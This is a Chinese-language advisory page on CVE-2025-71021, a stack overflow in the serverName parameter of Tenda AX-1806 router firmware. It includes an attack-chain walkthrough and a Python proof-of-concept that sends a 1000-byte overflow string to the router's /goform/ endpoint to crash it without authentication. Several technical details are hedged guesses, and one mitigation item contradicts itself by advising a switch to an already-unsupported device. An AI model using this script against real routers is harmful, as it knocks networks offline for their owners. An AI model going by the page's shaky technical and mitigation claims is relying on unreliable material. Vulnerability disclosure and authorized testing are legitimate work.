CVE-2025-71021 Tenda AX-1806 serverName参数栈溢出漏洞导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-71021

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AX-1806 v1.0.0.1

漏洞概述

CVE-2025-71021是Tenda AX-1806 v1.0.0.1路由器固件中存在的一个高危安全漏洞。该漏洞位于路由器固件的sub_65A28函数中，由于对serverName参数的用户输入缺乏充分的边界检查，导致攻击者可以通过构造超长的serverName参数触发栈溢出。当攻击者发送包含恶意超长serverName值的HTTP请求时，过长的数据会覆盖栈上的返回地址和其他关键变量，可能导致程序崩溃或执行任意代码。在无需认证且无需用户交互的情况下，攻击者即可远程利用此漏洞，造成路由器服务中断，形成拒绝服务(DoS)攻击。此漏洞的CVSS评分为7.5，属于高危级别，对网络设备的可用性构成严重威胁。

技术细节

该漏洞的根本原因在于Tenda AX-1806 v1.0.0.1固件中的sub_65A28函数对serverName参数的处理存在安全缺陷。在C/C++编写的嵌入式系统中，栈溢出通常发生在函数使用局部数组存储用户输入数据时，如果输入长度超过数组预留空间，就会覆盖相邻的栈帧数据。在本漏洞中，serverName参数被直接传递给sub_65A28函数，函数内部可能使用固定大小的栈缓冲区存储该参数，而未进行长度验证。攻击者可以通过发送精心构造的HTTP POST/GET请求，在serverName字段中填充超长字符串（如数百或数千个字符），使数据溢出到栈上的返回地址区域。当函数执行完毕返回时，程序计数器可能被劫持，导致拒绝服务或潜在的代码执行。由于该漏洞存在于路由器的Web管理接口，攻击者可通过互联网远程触发，无需任何认证凭证。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标Tenda AX-1806路由器，确认其IP地址和Web管理接口可达，通常使用默认端口80或8080访问管理界面

STEP 2

步骤2

构造恶意请求：攻击者构造包含超长serverName参数值的HTTP POST请求，超长字符串（如1000字节以上的'A'字符）用于触发栈溢出

STEP 3

步骤3

发送漏洞利用请求：攻击者向路由器的/goform/路径或相关API端点发送恶意请求，serverName参数中包含精心设计的溢出载荷

STEP 4

步骤4

触发栈溢出：固件中的sub_65A28函数接收到超长serverName参数后，未进行长度检查直接将数据写入固定大小的栈缓冲区，导致相邻栈帧被覆盖

STEP 5

步骤5

拒绝服务或代码执行：栈溢出覆盖返回地址后，函数返回时程序跳转到不可控地址或崩溃，导致路由器服务中断（DoS），在特定条件下可能实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-71021 PoC - Tenda AX-1806 Stack Overflow in serverName Parameter
This PoC demonstrates a stack overflow vulnerability in the sub_65A28 function
of Tenda AX-1806 v1.0.0.1 firmware via the serverName parameter.
"""

import requests
import sys

TARGET_IP = "192.168.0.1"  # Default Tenda router IP
TARGET_PORT = 80
CVE_ID = "CVE-2025-71021"

def check_vulnerability(target_ip, port=80):
    """Check if target is vulnerable to CVE-2025-71021"""
    url = f"http://{target_ip}:{port}/goform/"
    
    # Payload with oversized serverName parameter to trigger stack overflow
    # The exact overflow length may vary; 1000+ bytes typically sufficient
    overflow_payload = "A" * 1000
    
    # Construct the malicious request
    data = {
        "serverName": overflow_payload,
        "action": "submit"
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    try:
        print(f"[*] Sending exploit payload for {CVE_ID}")
        print(f"[*] Target: {url}")
        print(f"[*] Payload length: {len(overflow_payload)} bytes")
        
        response = requests.post(url, data=data, headers=headers, timeout=10)
        
        # Check if device becomes unresponsive or returns error
        if response.status_code in [500, 502, 503] or len(response.content) < 50:
            print(f"[+] Exploit successful! Target may be crashed.")
            return True
        else:
            print(f"[*] Response received. Device may require multiple attempts.")
            return False
            
    except requests.exceptions.Timeout:
        print(f"[+] Exploit successful! Target did not respond (DoS confirmed).")
        return True
    except requests.exceptions.ConnectionError:
        print(f"[+] Exploit successful! Connection refused - target crashed.")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_IP
    print(f"[*] CVE-2025-71021 PoC - Tenda AX-1806 Stack Overflow")
    check_vulnerability(target, TARGET_PORT)

影响范围

Tenda AX-1806 v1.0.0.1

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 立即禁用路由器的远程Web管理功能，改为仅允许本地局域网访问；2) 使用防火墙规则限制对路由器80/8080端口的访问，仅允许受信任的IP地址；3) 监控路由器日志，关注异常的HTTP请求模式；4) 考虑更换为已停止支持的老旧设备；5) 定期重启路由器以清理可能的恶意进程状态。